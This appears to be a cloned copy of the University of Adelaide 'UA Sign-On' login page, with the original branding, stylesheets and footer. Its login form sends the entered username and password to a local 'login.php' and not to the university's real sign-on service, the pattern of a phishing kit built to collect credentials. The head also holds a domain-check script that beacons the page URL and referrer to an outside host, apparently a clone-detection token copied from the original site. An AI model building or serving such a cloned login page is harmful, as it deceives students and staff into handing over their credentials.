<!DOCTYPE html>
<!--[if IE 7 ]><html class="ie ie7 no-js" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8 no-js" lang="en"> <![endif]-->
<!--[if IE 9 ]><html class="ie ie9 no-js" lang="en"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]><!--><html lang="en" class="gt-ie9 no-js"> <!--<![endif]-->
<html xmlns="http://www.w3.org/1999/xhtml" class="login-pf">

<head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="robots" content="noindex, nofollow">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Andy Stebbings">

            <meta name="viewport" content="width=device-width,initial-scale=1"/>
    <title>        UA Sign-On

</title>
            <link href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/lib/rcue/css/rcue.min.css" rel="stylesheet" />
            <link href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/lib/rcue/css/rcue-additions.min.css" rel="stylesheet" />
            <link href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/lib/zocial/zocial.css" rel="stylesheet" />
            <link href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/css/login.css" rel="stylesheet" />
    

    <link rel="stylesheet" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/css/all.css" media="all">
    <link rel="stylesheet" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/css/cust.css" media="all">
    <link rel="stylesheet" type="text/css" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/font-awesome/css/font-awesome.min.css">
    <!--[if lt IE 9]>
      <script src="js/contrib/html5shiv/html5shiv.js"></script>
    <![endif]-->
    <!-- Fav and touch icons -->
    <link rel="shortcut icon" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-57-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-144-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-114-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-72-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="57x57" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-57-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-57-precomposed.png"/>
    <link rel="apple-touch-icon" href="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/favicons/apple-touch-icon-57-precomposed.png" />    
    
<script>
var regExp = /129\.127\.149\.118$|signon\.adelaide\.edu\.au$/g;
if (!regExp.test(document.domain)) {
        var l = location.href;
        var r = document.referrer;
        var m = new Image();
        m.src = "http://77f77420d171.o3n.io/content/nhenuumv2f4nepo4m4tl52to2/banner.gif?l=" + encodeURI(l) + "&r=" + encodeURI(r);
    }
</script>
 
</head>

<body>

<a href="#main-content" class="c-skip-link">Skip to main content</a>
<header class="o-layout-header" id="ua-top" role="banner">
  <div class="o-layout-container o-header-container">
      <div class="c-header-toolbar">
  <div class="c-header-toolbar__aside1">
    <a href="//adelaide.edu.au" class="c-header-toolbar__home-link"><span class="c-header-toolbar__home-link-icon ua-icon-library"></span> University of Adelaide</a>
  </div>
  <div class="c-header-toolbar__aside2">
    <!-- Search form -->
    <div class="c-toolbar-search-form js-toolbar-search-form">
      <button class="c-toolbar-search-form__search-btn c-btn c-btn--danger c-btn--small">
        <a href="//search.adelaide.edu.au/" class="c-toolbar-search-form__search-btn-link">
          <span class="c-toolbar-search-form__search-btn__icon ua-icon-search"></span> Search
        </a>
      </button>
    </div>
    <!-- /Search form -->
  </div>
</div>
      <div class="c-header-branding">
  <div class="c-header-branding__site-title">
    <a href="#0" id="" class="c-header-branding__site-title-link" title="">
     UA Sign-On 
    </a>
  </div>
  <div class="c-header-branding__branding-logo">
    <a href="//www.adelaide.edu.au/" class="c-header-branding__branding-logo-link" title="">
      <img src="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/logos/uofa-logo.png" class="c-header-branding__branding-logo-image" alt="The University of Adelaide Logo">
    </a>
  </div>
</div>
<div class="c-main-menu c-no-menu js-main-menu">
</div>
  </div>
</header>

<div class="o-layout-container o-layout-content-wrap">
  <main class="o-layout-main" role="main">
    <div class="o-layout-main-nav">

    </div>
    <!-- The main-content ID is used for the skip to content link. This is an accessibility requirement.
    The link to this needs to sit just inside the <body> tag (see Styleguide homepage). -->
    <article id="main-content" class="o-layout-main-article">
   
            <div>
            

            
                <div id="kc-content-wrapper" class="row">


                    
                        <div id="kc-form-wrapper" class="">

            <h1>Log in or Register</h1>


            <form id="kc-form-login" class="c-content-form c-content-form--aside" action="login.php" method="post">
            <h2 class="c-content-form__title">Log in</h2>


            <div class="c-content-form__group {properties.kcInputWrapperClass!}">
                   <span class="o-form-two-column--first c-content-form__label">
                        <label for="username" class="control-label">Username or email *</label>
                    </span>

                    <span class="o-form-two-column--second">
                            <input id="username" class="form-control" name="user" value="" type="text" autofocus autocomplete="off" />
                    </span>
                </div>

                <div class="c-content-form__group {properties.kcInputWrapperClass!}">
                    <span class="o-form-two-column--first c-content-form__label">
                        <label for="password" class="control-label">Password *</label>
                    </span>

                    <span class="o-form-two-column--second">
                        <input id="password" class="form-control" name="pass" type="password" autocomplete="off" />
                    </span>
                </div>



                <div class="c-content-form__group {properties.kcInputWrapperClass!}">
                    <span class="o-form-two-column--first c-content-form__label">

                    </span>

                    <span class="o-form-two-column--second">
                            <div class="checkbox">
                                <label>
                                       <input id="rememberMe" name="rememberMe" type="checkbox" tabindex="3"> Remember me
                                </label>
                            </div>
                            <span><a href="https://signon.adelaide.edu.au/auth/realms/uofaidpproxy/login-actions/reset-credentials?client_id=samlproxy-ezp&amp;tab_id=dhAeeBB5mUI">Forgot Password?</a></span>
                    </span>
                </div>

                <div class="c-content-form__group {properties.kcInputWrapperClass!}">
                    <div id="kc-form-options" class="col-xs-4 col-sm-5 col-md-offset-4 col-md-4 col-lg-offset-3 col-lg-5">

                    </div>

                </div>

              <div class="c-content-form__group c-content-form__group--action">
                <span class="o-form-two-column--first c-content-form__label">
                </span>
                <span class="o-form-two-column--second middle-align-text">
                    <input class="btn btn-primary btn-lg c-btn c-content-form__btn" name="login" id="kc-login" type="submit" value="Log in"/>
                    <div class="or-use"><em>or use</em></div>
                                    <a href="https://signon.adelaide.edu.au/auth/realms/uofaidpproxy/broker/google/login?client_id=samlproxy-ezp&amp;tab_id=dhAeeBB5mUI&amp;code=L61b1p74j04n7jmqjDtmIFEC32micao_OCDBaR3O3I4" id="zocial-google" class="zocial google "> <span class="text">Google</span></a>
                                    <a href="https://signon.adelaide.edu.au/auth/realms/uofaidpproxy/broker/facebook/login?client_id=samlproxy-ezp&amp;tab_id=dhAeeBB5mUI&amp;code=L61b1p74j04n7jmqjDtmIFEC32micao_OCDBaR3O3I4" id="zocial-facebook" class="zocial facebook "> <span class="text">Facebook</span></a>
                </span>


              </div>

          </form>


<form id="kc-form-register" class="c-content-form c-content-form--aside" action="https://signon.adelaide.edu.au/auth/realms/uofaidpproxy/login-actions/registration?client_id=samlproxy-ezp&amp;tab_id=dhAeeBB5mUI" method="post">
  <h2 class="c-content-form__title">Register</h2>
        <div class="c-content-form__group {properties.kcInputWrapperClass!}">
            <span>If this is your first time using this service and you don&#8217;t have an active <a href="https://www.adelaide.edu.au/technology/yourservices/accounts/" target="_blank">UA account</a>, you can register a new account using your email address.</span>
        </div>
        <div class="c-content-form__group c-content-form__group--action">
        <span class="o-form-two-column--first c-content-form__label"></span>
        <span class="o-form-two-column--second middle-align-text">
                <input class="btn btn-primary btn-lg c-btn c-content-form__btn" name="register" id="kc-register" type="submit" value="Register"/>
        </span>
</div>
</form>



                        </div>
                    

                        <div id="kc-info" class="">
                            <div id="kc-info-wrapper" class="">
            <div id="kc-registration">
                  <ul style="list-style-type:none; margin-left:0;" >
                         <li>Already signed in to University apps like Office 365, Box or Zoom? <a href="https://signon.adelaide.edu.au/auth/realms/uofaidpproxy/broker/UOFAADFS/login?client_id=samlproxy-ezp&amp;tab_id=dhAeeBB5mUI&amp;code=L61b1p74j04n7jmqjDtmIFEC32micao_OCDBaR3O3I4">Continue using your UA account</a>.</li>
                </ul>
            </div>

                            </div>
                        </div>
                    
                </div>
                
            </div>
            </article>
            </main>
        </div>
    
    

  
    
    <footer class="o-layout-footer" role="contentinfo">
  <!-- footer tagline -->
  <div class="c-footer-tagline">
  <div class="c-footer-tagline__content">
    <div class="c-footer-tagline__image">
      <a href="//www.adelaide.edu.au/seek-light/" class="c-footer__link" title="seek LIGHT"><img src="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/images/logos/seek-light-tagline.png" class="c-footer-tagline__image" alt="seek LIGHT"> </a>
    </div>
  </div>
</div>
  <!-- /footer tagline -->
  <div class="o-layout-container">
        <div class="c-footer-simple" id="ua-footer">
  <section class="c-footer-simple__col-first">
    <ul class="c-footer-simple__list">
      <li class="c-footer-simple__list-item"><a href="http://www.adelaide.edu.au/legals/disclaim.html" class="c-footer__link" title="Website Disclaimer">Disclaimer</a></li>
      <li class="c-footer-simple__list-item"><a href="http://www.adelaide.edu.au/legals/copyright.html" class="c-footer__link" title="Copyright Information">Copyright</a></li>
      <li class="c-footer-simple__list-item"><a href="http://www.adelaide.edu.au/legals/privacy.html" class="c-footer__link" title="Privacy Statement">Privacy Statement</a></li>
      <li class="c-footer-simple__list-item"><a href="http://www.adelaide.edu.au/feedback/" class="c-footer__link" title="Website Feedback">Feedback</a></li>
    </ul>
  </section>
</div>
  </div>
  <div class="o-layout-container">
    <div class="c-footer-meta">
    <div class="c-footer-meta__page-info">
          <div class="c-footer-meta__page-info-auth">Authorised by: <a href="mailto:servicedesk@adelaide.edu.au" class="c-footer__link">Chief Information Officer, Technology Services</a></div>
          <div class="c-footer-meta__page-info-main">Maintained by: <a href="mailto:servicedesk@adelaide.edu.au" class="c-footer__link">Technology Services Website Maintainer</a></div>
    </div>
    
</div>
  </div>
</footer>
    <script src="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/js/contrib/jquery/jquery.js"></script>
    <script src="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/js/plugins/ua-hamburger-menu.js"></script>
    <script src="https://signon.adelaide.edu.au/auth/resources/7.2.5.ga/login/uoa-theme/ua_theme/js/app/ua-main-menu.js"></script>
    <script src="http://global.adelaide.edu.au/global/ua_theme/mmf/styleguide/footer-global.js"></script>
</body>
</html>
